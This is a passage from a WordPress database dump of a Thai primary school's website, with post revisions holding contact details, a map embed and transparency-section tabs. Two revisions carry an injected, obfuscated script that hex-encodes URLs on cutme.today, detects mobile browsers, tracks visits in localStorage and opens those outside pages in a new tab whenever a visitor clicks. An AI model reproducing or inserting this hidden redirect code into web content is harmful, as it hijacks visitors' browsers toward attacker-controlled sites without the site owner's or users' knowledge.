)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','แนวปฏิบัติผู้รับบริการคู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อแนวปฏิบัติผู้รับบริการ','','inherit','closed','closed','','771-revision-v1','','','2024-08-30 12:18:23','2024-08-30 05:18:23','',771,'http://pakhaeng.ssk.in.th/?p=1076',0,'revision','',0),
(1077,1,'2024-08-30 12:20:10','2024-08-30 05:20:10','<!-- wp:buttons -->\n<div class=\"wp-block-buttons\"><!-- wp:button {\"backgroundColor\":\"vivid-cyan-blue\",\"width\":100,\"className\":\"is-style-outline\",\"style\":{\"border\":{\"radius\":\"19px\"}}} -->\n<div class=\"wp-block-button has-custom-width wp-block-button__width-100 is-style-outline\"><a class=\"wp-block-button__link has-vivid-cyan-blue-background-color has-background wp-element-button\" style=\"border-radius:19px\"><strong>โรงเรียนบ้านหนองปลาเข็ง กอไหล่</strong></a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:list -->\n<ul class=\"wp-block-list\"><!-- wp:list-item -->\n<li>ที่ตั้ง 96 หมู่ 6 ตำบลโพธิ์  อำเภอโนนคูณ จังหวัดศรีสะเกษ 33250</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>หมายเลขโทรศัพท์ :093-325-2659</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>E-mail : 33010169@sisaketedu1.go.th</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list -->\n\n<!-- wp:buttons -->\n<div class=\"wp-block-buttons\"><!-- wp:button {\"backgroundColor\":\"pale-cyan-blue\",\"width\":50,\"style\":{\"border\":{\"radius\":\"13px\"}}} -->\n<div class=\"wp-block-button has-custom-width wp-block-button__width-50\"><a class=\"wp-block-button__link has-pale-cyan-blue-background-color has-background wp-element-button\" style=\"border-radius:13px\"><strong>แผนที่ตั้ง</strong></a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {\"backgroundColor\":\"light-green-cyan\",\"width\":50,\"style\":{\"border\":{\"radius\":\"13px\"}}} -->\n<div class=\"wp-block-button has-custom-width wp-block-button__width-50\"><a class=\"wp-block-button__link has-light-green-cyan-background-color has-background wp-element-button\" style=\"border-radius:13px\"><strong>ติดต่อเราได้ที่</strong></a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":686,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"3c91321e\",\"isDynamic\":true,\"blockVersion\":4} /-->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ข้อมูลการติดต่อหน่วยงาน','','inherit','closed','closed','','362-revision-v1','','','2024-08-30 12:20:10','2024-08-30 05:20:10','',362,'http://pakhaeng.ssk.in.th/?p=1077',0,'revision','',0);
INSERT INTO `wp_posts` VALUES
(1079,1,'2024-08-30 12:22:24','2024-08-30 05:22:24','<!-- wp:generateblocks/image {\"uniqueId\":\"285d6904\",\"mediaId\":892,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-285d6904\"><img class=\"gb-image gb-image-285d6904\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post-2.png\" alt=\"\" title=\"Is It a Gift Instagram Post\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f5e8d6af\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:kadence/tabs {\"uniqueID\":\"871_e416be-74\",\"tabCount\":7,\"layout\":\"vtabs\",\"contentBgColor\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"contentBorderStyles\":[{\"top\":[\"#0a6689\",\"\",3],\"right\":[\"#0a6689\",\"\",0],\"bottom\":[\"#0a6689\",\"\",0],\"left\":[\"#0a6689\",\"\",0],\"unit\":\"px\"}],\"titles\":[{\"text\":\"ข้อมูลพื้นฐาน\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารงานและการใช้จ่ายงบประมาณ\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการจัดซื้อจัดจ้าง\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารและพัฒนาทรัพยากรบุคคล\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมคุณธรรมและความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"}],\"iSize\":16,\"titleColor\":\"#000000\",\"titleColorHover\":\"#ffffff\",\"titleColorActive\":\"#ffffff\",\"titleBg\":\"#8ed1fc\",\"titleBgHover\":\"#8ed1fc\",\"titleBgActive\":\"#0693e3\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderActive\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderWidth\":[0,0,0,0],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,0,0],\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"fontWeight\":\"bold\",\"verticalTabWidth\":[38,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id871_e416be-74 kt-tabs-has-7-tabs kt-active-tab-1 kt-tabs-layout-vtabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-left \"><ul class=\"kt-tabs-title-list\"><li id=\"tab-\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-active\"><a href=\"#tab-\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span class=\"kt-title-text\">ข้อมูลพื้นฐาน</span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span class=\"kt-title-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-3 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"3\" class=\"kt-tab-title kt-tab-title-3 \"><span class=\"kt-title-text\"><strong>การจัดซื้อจัดจ้าง</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-4 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"4\" class=\"kt-tab-title kt-tab-title-4 \"><span class=\"kt-title-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-5 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"5\" class=\"kt-tab-title kt-tab-title-5 \"><span class=\"kt-title-text\"><strong>การส่งเสริมความโปร่งใส</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-6 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"6\" class=\"kt-tab-title kt-tab-title-6 \"><span class=\"kt-title-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-7 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"7\" class=\"kt-tab-title kt-tab-title-7 \"><span class=\"kt-title-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"_a471bf-67\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab_a471bf-67\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_f98827-df\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_f98827-df kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_d803ff-d2\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_d803ff-d2\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\">โครงสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_921bc2-5c\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_921bc2-5c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469↗\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_cba98e-ee\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_cba98e-ee\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\">อำนาจหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_77fcfe-f3\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_77fcfe-f3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" 